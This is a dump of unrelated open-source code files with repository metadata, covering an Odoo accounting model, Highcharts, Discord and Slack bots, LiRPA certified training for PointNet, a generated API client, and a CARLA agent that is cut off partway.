217d30de43b0686c9b6a097430ce64fd2cb78174 | 130 | py | Python | test/conftest.py | eliasbrange/aws-cdk-template | 7ba7bc921bdd9c0064a6a661a2f47ee767ed70cc | [
"MIT"
] | 2 | 2022-01-03T11:11:32.000Z | 2022-03-11T16:34:51.000Z | test/conftest.py | eliasbrange/aws-cdk-template | 7ba7bc921bdd9c0064a6a661a2f47ee767ed70cc | [
"MIT"
] | null | null | null | test/conftest.py | eliasbrange/aws-cdk-template | 7ba7bc921bdd9c0064a6a661a2f47ee767ed70cc | [
"MIT"
] | 1 | 2022-03-25T20:35:16.000Z | 2022-03-25T20:35:16.000Z | import os.path as op
import sys
path = op.abspath(op.join(op.dirname(op.realpath(__file__)), "..", "src"))
sys.path.append(path)
| 21.666667 | 74 | 0.7 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 | 0.069231 |
217d4e0e9bc044b34a21ee15c3e1def8c727534c | 3,599 | py | Python | addons/stock_landed_costs/models/account_move.py | SHIVJITH/Odoo_Machine_Test | 310497a9872db7844b521e6dab5f7a9f61d365a4 | [
"Apache-2.0"
] | null | null | null | addons/stock_landed_costs/models/account_move.py | SHIVJITH/Odoo_Machine_Test | 310497a9872db7844b521e6dab5f7a9f61d365a4 | [
"Apache-2.0"
] | null | null | null | addons/stock_landed_costs/models/account_move.py | SHIVJITH/Odoo_Machine_Test | 310497a9872db7844b521e6dab5f7a9f61d365a4 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import api, fields, models
class AccountMove(models.Model):
_inherit = 'account.move'
landed_costs_ids = fields.One2many('stock.landed.cost', 'vendor_bill_id', string='Landed Costs')
landed_costs_visible = fields.Boolean(compute='_compute_landed_costs_visible')
@api.depends('line_ids', 'line_ids.is_landed_costs_line')
def _compute_landed_costs_visible(self):
for account_move in self:
if account_move.landed_costs_ids:
account_move.landed_costs_visible = False
else:
account_move.landed_costs_visible = any(line.is_landed_costs_line for line in account_move.line_ids)
def button_create_landed_costs(self):
"""Create a `stock.landed.cost` record associated to the account move of `self`, each
`stock.landed.costs` lines mirroring the current `account.move.line` of self.
"""
self.ensure_one()
landed_costs_lines = self.line_ids.filtered(lambda line: line.is_landed_costs_line)
landed_costs = self.env['stock.landed.cost'].create({
'vendor_bill_id': self.id,
'cost_lines': [(0, 0, {
'product_id': l.product_id.id,
'name': l.product_id.name,
'account_id': l.product_id.product_tmpl_id.get_product_accounts()['stock_input'].id,
'price_unit': l.currency_id._convert(l.price_subtotal, l.company_currency_id, l.company_id, l.move_id.date),
'split_method': l.product_id.split_method_landed_cost or 'equal',
}) for l in landed_costs_lines],
})
action = self.env["ir.actions.actions"]._for_xml_id("stock_landed_costs.action_stock_landed_cost")
return dict(action, view_mode='form', res_id=landed_costs.id, views=[(False, 'form')])
def action_view_landed_costs(self):
self.ensure_one()
action = self.env["ir.actions.actions"]._for_xml_id("stock_landed_costs.action_stock_landed_cost")
domain = [('id', 'in', self.landed_costs_ids.ids)]
context = dict(self.env.context, default_vendor_bill_id=self.id)
views = [(self.env.ref('stock_landed_costs.view_stock_landed_cost_tree2').id, 'tree'), (False, 'form'), (False, 'kanban')]
return dict(action, domain=domain, context=context, views=views)
class AccountMoveLine(models.Model):
_inherit = 'account.move.line'
product_type = fields.Selection(related='product_id.type', readonly=True)
is_landed_costs_line = fields.Boolean()
@api.onchange('is_landed_costs_line')
def _onchange_is_landed_costs_line(self):
"""Mark an invoice line as a landed cost line and adapt `self.account_id`. The default
value can be set according to `self.product_id.landed_cost_ok`."""
if self.product_id:
accounts = self.product_id.product_tmpl_id._get_product_accounts()
if self.product_type != 'service':
self.account_id = accounts['expense']
self.is_landed_costs_line = False
elif self.is_landed_costs_line and self.move_id.company_id.anglo_saxon_accounting:
self.account_id = accounts['stock_input']
else:
self.account_id = accounts['expense']
@api.onchange('product_id')
def _onchange_is_landed_costs_line_product(self):
if self.product_id.landed_cost_ok:
self.is_landed_costs_line = True
else:
self.is_landed_costs_line = False
| 47.355263 | 130 | 0.674632 | 3,456 | 0.960267 | 0 | 0 | 1,340 | 0.372326 | 0 | 0 | 1,028 | 0.285635 |
217ddb7ab709173147528cb6c585bd4df64516a7 | 4,025 | py | Python | examples/highcharts/pie-donut.py | Jbrunn/python-highcharts | a4c488ae5c2e125616efad5a722f3dfd8a9bc450 | [
"MIT"
] | 370 | 2015-10-07T20:13:10.000Z | 2022-03-31T03:43:17.000Z | examples/highcharts/pie-donut.py | Jbrunn/python-highcharts | a4c488ae5c2e125616efad5a722f3dfd8a9bc450 | [
"MIT"
] | 67 | 2016-03-14T12:18:44.000Z | 2022-02-24T09:24:31.000Z | examples/highcharts/pie-donut.py | Jbrunn/python-highcharts | a4c488ae5c2e125616efad5a722f3dfd8a9bc450 | [
"MIT"
] | 159 | 2016-02-25T15:07:52.000Z | 2022-03-12T13:04:14.000Z | # -*- coding: utf-8 -*-
"""
Highcharts Demos
Donut chart: http://www.highcharts.com/demo/pie-donut
"""
from highcharts import Highchart
H = Highchart(width = 850, height = 400)
data = [{
'y': 55.11,
'color': 'Highcharts.getOptions().colors[0]',
'drilldown': {
'name': 'MSIE versions',
'categories': ['MSIE 6.0', 'MSIE 7.0', 'MSIE 8.0', 'MSIE 9.0'],
'data': [10.85, 7.35, 33.06, 2.81],
'color': 'Highcharts.getOptions().colors[0]'
}
}, {
'y': 21.63,
'color': 'Highcharts.getOptions().colors[1]',
'drilldown': {
'name': 'Firefox versions',
'categories': ['Firefox 2.0', 'Firefox 3.0', 'Firefox 3.5', 'Firefox 3.6', 'Firefox 4.0'],
'data': [0.20, 0.83, 1.58, 13.12, 5.43],
'color': 'Highcharts.getOptions().colors[1]'
}
}, {
'y': 11.94,
'color': 'Highcharts.getOptions().colors[2]',
'drilldown': {
'name': 'Chrome versions',
'categories': ['Chrome 5.0', 'Chrome 6.0', 'Chrome 7.0', 'Chrome 8.0', 'Chrome 9.0',
'Chrome 10.0', 'Chrome 11.0', 'Chrome 12.0'],
'data': [0.12, 0.19, 0.12, 0.36, 0.32, 9.91, 0.50, 0.22],
'color': 'Highcharts.getOptions().colors[2]'
}
}, {
'y': 7.15,
'color': 'Highcharts.getOptions().colors[3]',
'drilldown': {
'name': 'Safari versions',
'categories': ['Safari 5.0', 'Safari 4.0', 'Safari Win 5.0', 'Safari 4.1', 'Safari/Maxthon',
'Safari 3.1', 'Safari 4.1'],
'data': [4.55, 1.42, 0.23, 0.21, 0.20, 0.19, 0.14],
'color': 'Highcharts.getOptions().colors[3]'
}
}, {
'y': 2.14,
'color': 'Highcharts.getOptions().colors[4]',
'drilldown': {
'name': 'Opera versions',
'categories': ['Opera 9.x', 'Opera 10.x', 'Opera 11.x'],
'data': [ 0.12, 0.37, 1.65],
'color': 'Highcharts.getOptions().colors[4]'
}
}]
options = {
'chart': {
'type': 'pie'
},
'title': {
'text': 'Browser market share, April, 2011'
},
'yAxis': {
'title': {
'text': 'Total percent market share'
}
},
'plotOptions': {
'pie': {
'shadow': False,
'center': ['50%', '50%']
}
},
'tooltip': {
'valueSuffix': '%'
},
}
categories = ['MSIE', 'Firefox', 'Chrome', 'Safari', 'Opera']
browserData = []
versionsData = []
for i in range(len(data)):
browserData.append({
'name': categories[i],
'y': data[i]['y'],
'color': data[i]['color']
})
drillDataLen = len(data[i]['drilldown']['data'])
for j in range(drillDataLen):
brightness = 0.2 - (j / drillDataLen) / 5;
versionsData.append({
'name': data[i]['drilldown']['categories'][j],
'y': data[i]['drilldown']['data'][j],
'color': 'Highcharts.Color(' + data[i]['color'] + ').brighten(' + str(brightness) + ').get()'
})
H.set_dict_options(options)
H.add_data_set(browserData, 'pie', 'Browsers', size='60%',
dataLabels={
'formatter': 'function () { \
return this.y > 5 ? this.point.name : null;\
}',
'color': 'white',
'distance': -30
})
H.add_data_set(versionsData, 'pie', 'Versions', size='80%',
innerSize='60%',
dataLabels={
'formatter': "function () {\
return this.y > 1 ? '<b>' + this.point.name + ':</b> ' + this.y + '%' : null;\
}"
})
H.htmlcontent | 32.459677 | 115 | 0.429814 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,882 | 0.467578 |
217fa2fb2460ab023c2ba02ea8a4fbc0c4e79eb1 | 961 | py | Python | computer_firm.py | GYosifov88/Python-Basics | f4290061264aebc417bde4948948e4a64739fec9 | [
"MIT"
] | null | null | null | computer_firm.py | GYosifov88/Python-Basics | f4290061264aebc417bde4948948e4a64739fec9 | [
"MIT"
] | null | null | null | computer_firm.py | GYosifov88/Python-Basics | f4290061264aebc417bde4948948e4a64739fec9 | [
"MIT"
] | null | null | null | number_of_computers = int(input())
number_of_sales = 0
real_sales = 0
made_sales = 0
counter_sales = 0
total_ratings = 0
for i in range (number_of_computers):
rating = int(input())
rating_scale = rating % 10
possible_sales = rating // 10
total_ratings += rating_scale
if rating_scale == 2:
real_sales = possible_sales * 0 / 100
counter_sales += real_sales
elif rating_scale == 3:
real_sales = possible_sales * 50 / 100
counter_sales += real_sales
elif rating_scale == 4:
real_sales = possible_sales * 70 / 100
counter_sales += real_sales
elif rating_scale == 5:
real_sales = possible_sales * 85 / 100
counter_sales += real_sales
elif rating_scale == 6:
real_sales = possible_sales * 100 / 100
counter_sales += real_sales
average_rating = total_ratings / number_of_computers
print (f'{counter_sales:.2f}')
print (f'{average_rating:.2f}')
| 25.289474 | 52 | 0.661811 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 45 | 0.046826 |
21803ff77639fb917a3ee0c55d6b108129313c9e | 902 | py | Python | cogs/messages.py | abdieg/cirila-bot-discord | e6956213cf42762b0260bd71dab47f3217c21560 | [
"MIT"
] | null | null | null | cogs/messages.py | abdieg/cirila-bot-discord | e6956213cf42762b0260bd71dab47f3217c21560 | [
"MIT"
] | null | null | null | cogs/messages.py | abdieg/cirila-bot-discord | e6956213cf42762b0260bd71dab47f3217c21560 | [
"MIT"
] | null | null | null | import discord
import os
import asyncio
from discord.ext import commands
from random import randint
from cogs.libs import Settings
from cogs.libs import Utils
class Messages(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.Cog.listener()
async def on_message(self, message):
channel = message.channel
if isinstance(channel, discord.TextChannel):
content_of_message = message.content
content_of_message = content_of_message.lower()
author_id = str(message.author.id)
author_name = message.author.name
# message_mentions = message.mentions
if author_id != str(Settings.CIRILABOTID):
print("\nAlguien escribio un mensaje")
print(author_name)
await channel.send("Hola")
def setup(bot):
bot.add_cog(Messages(bot)) | 29.096774 | 59 | 0.645233 | 694 | 0.769401 | 0 | 0 | 607 | 0.672949 | 578 | 0.640798 | 74 | 0.08204 |
218267a67d6b77155bce24d14dba6bc7cf42c90c | 315 | py | Python | features/best_move.py | raaahuuulll/chess-concepts | 92fbed433c1270f8235f454bb4f5416e577bf8a6 | [
"Apache-2.0"
] | null | null | null | features/best_move.py | raaahuuulll/chess-concepts | 92fbed433c1270f8235f454bb4f5416e577bf8a6 | [
"Apache-2.0"
] | null | null | null | features/best_move.py | raaahuuulll/chess-concepts | 92fbed433c1270f8235f454bb4f5416e577bf8a6 | [
"Apache-2.0"
] | null | null | null | from features.move import Move
class BestMove(Move):
# TODO: replace this with an attribute which specifies columns
@classmethod
def from_row(cls, row):
return cls(row.fen, row.best_move)
def features(self, prefix=None):
return super(BestMove, self).features(prefix="best_move")
| 24.230769 | 66 | 0.698413 | 281 | 0.892063 | 0 | 0 | 83 | 0.263492 | 0 | 0 | 73 | 0.231746 |
218374c68202eece0493e23ec9145bf2c5224fa4 | 728 | py | Python | util.py | logonod/demoss | c792f6471fc4a30297688db90d221d31d447633a | [
"BSD-2-Clause"
] | null | null | null | util.py | logonod/demoss | c792f6471fc4a30297688db90d221d31d447633a | [
"BSD-2-Clause"
] | null | null | null | util.py | logonod/demoss | c792f6471fc4a30297688db90d221d31d447633a | [
"BSD-2-Clause"
] | null | null | null | import skimage.io
import skimage.transform
import numpy as np
def load_image( path ):
try:
img = skimage.io.imread( path ).astype( float )
except:
return None
if img is None: return None
if len(img.shape) < 2: return None
if len(img.shape) == 4: return None
if len(img.shape) == 2: img=np.tile(img[:,:,None], 3)
if img.shape[2] == 4: img=img[:,:,:3]
if img.shape[2] > 4: return None
img /= 255.
short_edge = min( img.shape[:2] )
yy = int((img.shape[0] - short_edge) / 2)
xx = int((img.shape[1] - short_edge) / 2)
crop_img = img[yy:yy+short_edge, xx:xx+short_edge]
resized_img = skimage.transform.resize( crop_img, [224,224] )
return resized_img
| 25.103448 | 65 | 0.608516 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
21844501c3e337cf2b53931afe55bce1da09fdf2 | 248 | py | Python | adgbot/slack.py | astrodatagroup/slack-bot | 9e2bf073972c0ac34a76e86746dd77556cdf7451 | [
"MIT"
] | 2 | 2020-03-12T23:44:54.000Z | 2020-04-24T12:59:08.000Z | adgbot/slack.py | astrodatagroup/slack-bot | 9e2bf073972c0ac34a76e86746dd77556cdf7451 | [
"MIT"
] | 4 | 2020-04-24T12:57:30.000Z | 2020-08-08T14:57:30.000Z | adgbot/slack.py | astrodatagroup/slack-bot | 9e2bf073972c0ac34a76e86746dd77556cdf7451 | [
"MIT"
] | 2 | 2020-08-07T16:33:57.000Z | 2021-10-04T15:26:57.000Z | # -*- coding: utf-8 -*-
__all__ = ["post_message"]
import requests
from . import config
def post_message(message):
secrets = config.SLACK_JSON
r = requests.post(secrets["webhook_url"], json=dict(text=message))
r.raise_for_status()
| 17.714286 | 70 | 0.689516 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 50 | 0.201613 |
21854e402e44b3f6ade05c63d51b295cbf536a9f | 10,054 | py | Python | train_lirpa.py | eth-sri/3dcertify | bb10f339f80149a9ebc7c07d041b2ef222efb394 | [
"Apache-2.0"
] | 9 | 2021-03-31T20:27:50.000Z | 2022-01-07T21:52:47.000Z | train_lirpa.py | eth-sri/3dcertify | bb10f339f80149a9ebc7c07d041b2ef222efb394 | [
"Apache-2.0"
] | 2 | 2021-06-21T15:38:07.000Z | 2021-11-08T09:10:09.000Z | train_lirpa.py | eth-sri/3dcertify | bb10f339f80149a9ebc7c07d041b2ef222efb394 | [
"Apache-2.0"
] | 4 | 2021-07-17T15:04:14.000Z | 2022-02-09T17:51:39.000Z | import argparse
import multiprocessing
import random
import time
import torch.optim as optim
from auto_LiRPA.eps_scheduler import LinearScheduler, AdaptiveScheduler, SmoothedScheduler, FixedScheduler
from auto_LiRPA.perturbations import *
from auto_LiRPA.utils import MultiAverageMeter
from torch.nn import CrossEntropyLoss
from torch.utils.data import DataLoader
from lirpa_integration import SemanticTransformation
from transformations.twisting import TwistingZ
from relaxations.interval import Interval
from data_processing import datasets
from auto_LiRPA import BoundedModule, BoundedTensor
from pointnet.model import PointNet
from util.argparse import parse_theta
parser = argparse.ArgumentParser()
parser.add_argument("--verify", action="store_true", help='verification mode, do not train')
parser.add_argument("--load", type=str, default="", help='Load pretrained model')
parser.add_argument("--device", type=str, default="cuda", choices=["cpu", "cuda"], help='use cpu or cuda')
parser.add_argument("--data", type=str, default="MNIST", choices=["MNIST", "CIFAR"], help='dataset')
parser.add_argument("--seed", type=int, default=100, help='random seed')
parser.add_argument("--eps", type=float, default=0.01, help='Target training epsilon')
parser.add_argument("--bound_type", type=str, default="CROWN-IBP",
choices=["IBP", "CROWN-IBP", "CROWN", "CROWN-FAST"], help='method of bound analysis')
parser.add_argument("--model", type=str, default="resnet", help='model name (mlp_3layer, cnn_4layer, cnn_6layer, cnn_7layer, resnet)')
parser.add_argument("--num_epochs", type=int, default=100, help='number of total epochs')
parser.add_argument("--batch_size", type=int, default=256, help='batch size')
parser.add_argument("--lr", type=float, default=5e-4, help='learning rate')
parser.add_argument("--scheduler_name", type=str, default="SmoothedScheduler",
choices=["LinearScheduler", "AdaptiveScheduler", "SmoothedScheduler", "FixedScheduler"], help='epsilon scheduler')
parser.add_argument("--scheduler_opts", type=str, default="start=3,length=60", help='options for epsilon scheduler')
parser.add_argument("--bound_opts", type=str, default=None, choices=["same-slope", "zero-lb", "one-lb"],
help='bound options')
parser.add_argument("--conv_mode", type=str, choices=["matrix", "patches"], default="matrix")
parser.add_argument("--save_model", type=str, default='')
parser.add_argument("--num_points", type=int, default=64)
parser.add_argument('--pooling', type=str, default='max', choices=['max', 'avg'], help="The pooling function to use")
args = parser.parse_args()
def Train(model, t, loader, eps_scheduler, norm, train, opt, bound_type, method='robust'):
num_class = 40
meter = MultiAverageMeter()
if train:
model.train()
eps_scheduler.train()
eps_scheduler.step_epoch()
eps_scheduler.set_epoch_length(int((len(loader.dataset) + loader.batch_size - 1) / loader.batch_size))
else:
model.eval()
eps_scheduler.eval()
for i, (data, _, labels) in enumerate(loader):
start = time.time()
data = data.float()
labels = labels.squeeze()
eps_scheduler.step_batch()
eps = eps_scheduler.get_eps()
# For small eps just use natural training, no need to compute LiRPA bounds
batch_method = method
if eps < 1e-20:
batch_method = "natural"
if train:
opt.zero_grad()
# generate specifications
c = torch.eye(num_class).type_as(data)[labels].unsqueeze(1) - torch.eye(num_class).type_as(data).unsqueeze(0)
# remove specifications to self
I = (~(labels.data.unsqueeze(1) == torch.arange(num_class).type_as(labels.data).unsqueeze(0)))
c = (c[I].view(data.size(0), num_class - 1, num_class))
# bound input for Linf norm used only
data_ub = data + eps
data_lb = data - eps
if list(model.parameters())[0].is_cuda:
data, labels, c = data.cuda(), labels.cuda(), c.cuda()
data_lb, data_ub = data_lb.cuda(), data_ub.cuda()
ptb = PerturbationLpNorm(norm=np.inf, eps=eps, x_L=data_lb, x_U=data_ub)
x = BoundedTensor(data, ptb)
output = model(x)
regular_ce = CrossEntropyLoss()(output, labels) # regular CrossEntropyLoss used for warming up
meter.update('CE', regular_ce.item(), x.size(0))
meter.update('Err', torch.sum(torch.argmax(output, dim=1) != labels).cpu().detach().numpy() / x.size(0), x.size(0))
if batch_method == "robust":
if bound_type == "IBP":
lb, ub = model.compute_bounds(IBP=True, C=c, method=None)
elif bound_type == "CROWN":
lb, ub = model.compute_bounds(IBP=False, C=c, method="backward", bound_upper=False)
elif bound_type == "CROWN-IBP":
# lb, ub = model.compute_bounds(ptb=ptb, IBP=True, x=data, C=c, method="backward") # pure IBP bound
# we use a mixed IBP and CROWN-IBP bounds, leading to better performance (Zhang et al., ICLR 2020)
factor = (eps_scheduler.get_max_eps() - eps) / eps_scheduler.get_max_eps()
ilb, iub = model.compute_bounds(IBP=True, C=c, method=None)
if factor < 1e-5:
lb = ilb
else:
clb, cub = model.compute_bounds(IBP=False, C=c, method="backward", bound_upper=False)
lb = clb * factor + ilb * (1 - factor)
elif bound_type == "CROWN-FAST":
# model.compute_bounds(IBP=True, C=c, method=None)
lb, ub = model.compute_bounds(IBP=True, C=c, method=None)
lb, ub = model.compute_bounds(IBP=False, C=c, method="backward", bound_upper=False)
# Pad zero at the beginning for each example, and use fake label "0" for all examples
lb_padded = torch.cat((torch.zeros(size=(lb.size(0), 1), dtype=lb.dtype, device=lb.device), lb), dim=1)
fake_labels = torch.zeros(size=(lb.size(0),), dtype=torch.int64, device=lb.device)
robust_ce = CrossEntropyLoss()(-lb_padded, fake_labels)
if batch_method == "robust":
loss = robust_ce
elif batch_method == "natural":
loss = regular_ce
if train:
loss.backward()
eps_scheduler.update_loss(loss.item() - regular_ce.item())
opt.step()
meter.update('Loss', loss.item(), data.size(0))
if batch_method != "natural":
meter.update('Robust_CE', robust_ce.item(), data.size(0))
# For an example, if lower bounds of margins is >0 for all classes, the output is verifiably correct.
# If any margin is < 0 this example is counted as an error
meter.update('Verified_Err', torch.sum((lb < 0).any(dim=1)).item() / data.size(0), data.size(0))
meter.update('Time', time.time() - start)
if i % 50 == 0 and train:
print('[{:2d}:{:4d}]: eps={:.8f} {}'.format(t, i, eps, meter))
print('[{:2d}:{:4d}]: eps={:.8f} {}'.format(t, i, eps, meter))
def main(args):
torch.manual_seed(args.seed)
torch.cuda.manual_seed_all(args.seed)
random.seed(args.seed)
np.random.seed(args.seed)
## Step 1: Initial original model as usual, see model details in models/example_feedforward.py and models/example_resnet.py
model_ori = PointNet(
number_points=args.num_points,
num_classes=40,
pool_function=args.pooling
)
if args.load:
state_dict = torch.load(args.load)
model_ori.load_state_dict(state_dict)
print(state_dict)
## Step 2: Prepare dataset as usual
train_data = datasets.modelnet40(num_points=args.num_points, split='train', rotate='z')
test_data = datasets.modelnet40(num_points=args.num_points, split='test', rotate='none')
train_data = DataLoader(
dataset=train_data,
batch_size=args.batch_size,
shuffle=True,
num_workers=4
)
test_data = DataLoader(
dataset=test_data,
batch_size=args.batch_size,
shuffle=False,
num_workers=4
)
dummy_input = torch.randn(2, args.num_points, 3)
## Step 3: wrap model with auto_LiRPA
# The second parameter dummy_input is for constructing the trace of the computational graph.
model = BoundedModule(model_ori, dummy_input, bound_opts={'relu': args.bound_opts, 'conv_mode': args.conv_mode}, device=args.device)
## Step 4 prepare optimizer, epsilon scheduler and learning rate scheduler
opt = optim.Adam(model.parameters(), lr=args.lr)
norm = float(args.norm)
lr_scheduler = optim.lr_scheduler.StepLR(opt, step_size=10, gamma=0.5)
eps_scheduler = eval(args.scheduler_name)(args.eps, args.scheduler_opts)
print("Model structure: \n", str(model_ori))
## Step 5: start training
if args.verify:
eps_scheduler = FixedScheduler(args.eps)
with torch.no_grad():
Train(model, 1, test_data, eps_scheduler, norm, False, None, args.bound_type)
else:
timer = 0.0
for t in range(1, args.num_epochs + 1):
if eps_scheduler.reached_max_eps():
# Only decay learning rate after reaching the maximum eps
lr_scheduler.step()
print("Epoch {}, learning rate {}".format(t, lr_scheduler.get_lr()))
start_time = time.time()
Train(model, t, train_data, eps_scheduler, norm, True, opt, args.bound_type)
epoch_time = time.time() - start_time
timer += epoch_time
print('Epoch time: {:.4f}, Total time: {:.4f}'.format(epoch_time, timer))
print("Evaluating...")
with torch.no_grad():
Train(model, t, test_data, eps_scheduler, norm, False, None, args.bound_type)
torch.save(model.state_dict(), args.save_model if args.save_model != "" else args.model)
if __name__ == "__main__":
main(args)
| 47.424528 | 136 | 0.647106 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,381 | 0.236821 |
2185931a1852d943461e09408575acf28198d271 | 3,684 | py | Python | qcs_api_client/models/client_application.py | rigetti/qcs-api-client-python | 569cb9fa972dec1a706757374acb3df3ce649ec4 | [
"Apache-2.0"
] | 2 | 2021-12-15T23:24:40.000Z | 2022-01-03T01:14:17.000Z | qcs_api_client/models/client_application.py | rigetti/qcs-api-client-python | 569cb9fa972dec1a706757374acb3df3ce649ec4 | [
"Apache-2.0"
] | 3 | 2022-01-10T21:55:13.000Z | 2022-02-22T19:41:01.000Z | qcs_api_client/models/client_application.py | rigetti/qcs-api-client-python | 569cb9fa972dec1a706757374acb3df3ce649ec4 | [
"Apache-2.0"
] | 3 | 2021-12-15T23:24:42.000Z | 2022-01-09T11:16:17.000Z | from typing import Any, Callable, Dict, List, Optional, Type, TypeVar, Union
import attr
from ..models.client_applications_download_link import ClientApplicationsDownloadLink
from ..types import UNSET, Unset
from ..util.serialization import is_not_none
T = TypeVar("T", bound="ClientApplication")
@attr.s(auto_attribs=True)
class ClientApplication:
"""
Attributes:
latest_version (str): Semantic version
name (str):
supported (bool):
details_uri (Union[Unset, str]):
links (Union[Unset, List[ClientApplicationsDownloadLink]]):
minimum_version (Union[Unset, str]): Semantic version
"""
latest_version: str
name: str
supported: bool
details_uri: Union[Unset, str] = UNSET
links: Union[Unset, List[ClientApplicationsDownloadLink]] = UNSET
minimum_version: Union[Unset, str] = UNSET
additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)
def to_dict(self, pick_by_predicate: Optional[Callable[[Any], bool]] = is_not_none) -> Dict[str, Any]:
latest_version = self.latest_version
name = self.name
supported = self.supported
details_uri = self.details_uri
links: Union[Unset, List[Dict[str, Any]]] = UNSET
if not isinstance(self.links, Unset):
links = []
for links_item_data in self.links:
links_item = links_item_data.to_dict()
links.append(links_item)
minimum_version = self.minimum_version
field_dict: Dict[str, Any] = {}
field_dict.update(self.additional_properties)
field_dict.update(
{
"latestVersion": latest_version,
"name": name,
"supported": supported,
}
)
if details_uri is not UNSET:
field_dict["detailsUri"] = details_uri
if links is not UNSET:
field_dict["links"] = links
if minimum_version is not UNSET:
field_dict["minimumVersion"] = minimum_version
field_dict = {k: v for k, v in field_dict.items() if v != UNSET}
if pick_by_predicate is not None:
field_dict = {k: v for k, v in field_dict.items() if pick_by_predicate(v)}
return field_dict
@classmethod
def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:
d = src_dict.copy()
latest_version = d.pop("latestVersion")
name = d.pop("name")
supported = d.pop("supported")
details_uri = d.pop("detailsUri", UNSET)
links = []
_links = d.pop("links", UNSET)
for links_item_data in _links or []:
links_item = ClientApplicationsDownloadLink.from_dict(links_item_data)
links.append(links_item)
minimum_version = d.pop("minimumVersion", UNSET)
client_application = cls(
latest_version=latest_version,
name=name,
supported=supported,
details_uri=details_uri,
links=links,
minimum_version=minimum_version,
)
client_application.additional_properties = d
return client_application
@property
def additional_keys(self) -> List[str]:
return list(self.additional_properties.keys())
def __getitem__(self, key: str) -> Any:
return self.additional_properties[key]
def __setitem__(self, key: str, value: Any) -> None:
self.additional_properties[key] = value
def __delitem__(self, key: str) -> None:
del self.additional_properties[key]
def __contains__(self, key: str) -> bool:
return key in self.additional_properties
| 31.758621 | 106 | 0.628664 | 3,354 | 0.910423 | 0 | 0 | 3,381 | 0.917752 | 0 | 0 | 447 | 0.121336 |
2186641f0d4ffce02d56535a8ecd616ced38432d | 73 | py | Python | Configuration/Eras/python/Modifier_run2_GEM_2017_cff.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 852 | 2015-01-11T21:03:51.000Z | 2022-03-25T21:14:00.000Z | Configuration/Eras/python/Modifier_run2_GEM_2017_cff.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 30,371 | 2015-01-02T00:14:40.000Z | 2022-03-31T23:26:05.000Z | Configuration/Eras/python/Modifier_run2_GEM_2017_cff.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 3,240 | 2015-01-02T05:53:18.000Z | 2022-03-31T17:24:21.000Z | import FWCore.ParameterSet.Config as cms
run2_GEM_2017 = cms.Modifier()
| 18.25 | 40 | 0.808219 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
2187970fb1dec3395b976692b9ba5465f2f484c3 | 16,792 | py | Python | d4rl/carla/data_collection_agent_lane.py | chappers/d4rl | b838da60b51c98c1d673a81657f58a44ccf5d3fe | [
"Apache-2.0"
] | 552 | 2020-04-20T01:07:02.000Z | 2022-03-31T16:47:39.000Z | d4rl/carla/data_collection_agent_lane.py | chappers/d4rl | b838da60b51c98c1d673a81657f58a44ccf5d3fe | [
"Apache-2.0"
] | 103 | 2020-04-20T14:18:32.000Z | 2022-03-30T14:33:45.000Z | d4rl/carla/data_collection_agent_lane.py | chappers/d4rl | b838da60b51c98c1d673a81657f58a44ccf5d3fe | [
"Apache-2.0"
] | 135 | 2020-04-21T16:57:52.000Z | 2022-03-30T14:29:55.000Z | # !/usr/bin/env python
# Copyright (c) 2019 Computer Vision Center (CVC) at the Universitat Autonoma de
# Barcelona (UAB).
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
#
# Modified by Rowan McAllister on 20 April 2020
import argparse
import datetime
import glob
import os
import random
import sys
import time
from PIL import Image
from PIL.PngImagePlugin import PngInfo
try:
sys.path.append(glob.glob('../carla/dist/carla-*%d.%d-%s.egg' % (
sys.version_info.major,
sys.version_info.minor,
'win-amd64' if os.name == 'nt' else 'linux-x86_64'))[0])
except IndexError:
pass
import carla
import math
from dotmap import DotMap
try:
import pygame
except ImportError:
raise RuntimeError('cannot import pygame, make sure pygame package is installed')
try:
import numpy as np
except ImportError:
raise RuntimeError('cannot import numpy, make sure numpy package is installed')
try:
import queue
except ImportError:
import Queue as queue
from agents.navigation.agent import Agent, AgentState
from agents.navigation.local_planner import LocalPlanner
from agents.navigation.global_route_planner import GlobalRoutePlanner
from agents.tools.misc import is_within_distance_ahead, compute_magnitude_angle
from agents.navigation.global_route_planner_dao import GlobalRoutePlannerDAO
def is_within_distance(target_location, current_location, orientation, max_distance, d_angle_th_up, d_angle_th_low=0):
"""
Check if a target object is within a certain distance from a reference object.
A vehicle in front would be something around 0 deg, while one behind around 180 deg.
:param target_location: location of the target object
:param current_location: location of the reference object
:param orientation: orientation of the reference object
:param max_distance: maximum allowed distance
:param d_angle_th_up: upper thereshold for angle
:param d_angle_th_low: low thereshold for angle (optional, default is 0)
:return: True if target object is within max_distance ahead of the reference object
"""
target_vector = np.array([target_location.x - current_location.x, target_location.y - current_location.y])
norm_target = np.linalg.norm(target_vector)
# If the vector is too short, we can simply stop here
if norm_target < 0.001:
return True
if norm_target > max_distance:
return False
forward_vector = np.array(
[math.cos(math.radians(orientation)), math.sin(math.radians(orientation))])
d_angle = math.degrees(math.acos(np.clip(np.dot(forward_vector, target_vector) / norm_target, -1., 1.)))
return d_angle_th_low < d_angle < d_angle_th_up
def compute_distance(location_1, location_2):
"""
Euclidean distance between 3D points
:param location_1, location_2: 3D points
"""
x = location_2.x - location_1.x
y = location_2.y - location_1.y
z = location_2.z - location_1.z
norm = np.linalg.norm([x, y, z]) + np.finfo(float).eps
return norm
class CarlaSyncMode(object):
"""
Context manager to synchronize output from different sensors. Synchronous
mode is enabled as long as we are inside this context
